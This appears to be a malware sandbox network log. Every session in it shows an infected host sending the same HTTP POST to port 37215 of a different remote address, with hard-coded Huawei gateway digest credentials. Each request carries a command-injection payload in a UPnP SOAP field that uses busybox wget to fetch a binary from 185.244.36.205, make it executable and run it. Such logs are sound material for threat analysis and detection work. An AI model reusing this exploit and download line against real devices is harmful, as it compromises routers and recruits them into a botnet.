                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1972192.168.2.1553578157.132.52.24237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.090396881 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1973192.168.2.154685231.123.138.21537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.091171980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1974192.168.2.1554006222.120.182.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.091222048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1975192.168.2.1546436186.151.85.7037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.091777086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1976192.168.2.155833045.66.151.15437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.092055082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1977192.168.2.1547138197.79.214.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.092428923 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1978192.168.2.1543884186.223.96.19937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.093302965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1979192.168.2.154104631.131.228.19037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.093303919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1980192.168.2.1542560121.214.26.25537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.093307018 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1981192.168.2.154013641.90.122.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.093667030 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1982192.168.2.1559196138.241.109.13437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.094496012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
